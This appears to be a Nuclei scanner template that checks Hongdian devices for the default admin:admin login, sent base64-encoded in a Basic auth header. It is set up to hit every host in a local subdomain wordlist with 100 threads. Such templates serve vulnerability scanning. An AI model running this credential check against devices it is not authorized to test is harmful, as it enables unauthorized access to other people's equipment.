id: hongdian-default-login 2

info:
  name: Hongdian Default Login
  author: gy741
  severity: high
  tags: hongdian,default-login

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /api/proxy/tcp HTTP/1.1
        Host: {{Subdomains}}
        Authorization: Basic YWRtaW46YWRtaW4=
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "text/html"
        part: header

      - type: word
        words:
          - "status_main.cgi"
        part: body

      - type: status
        status:
          - 200
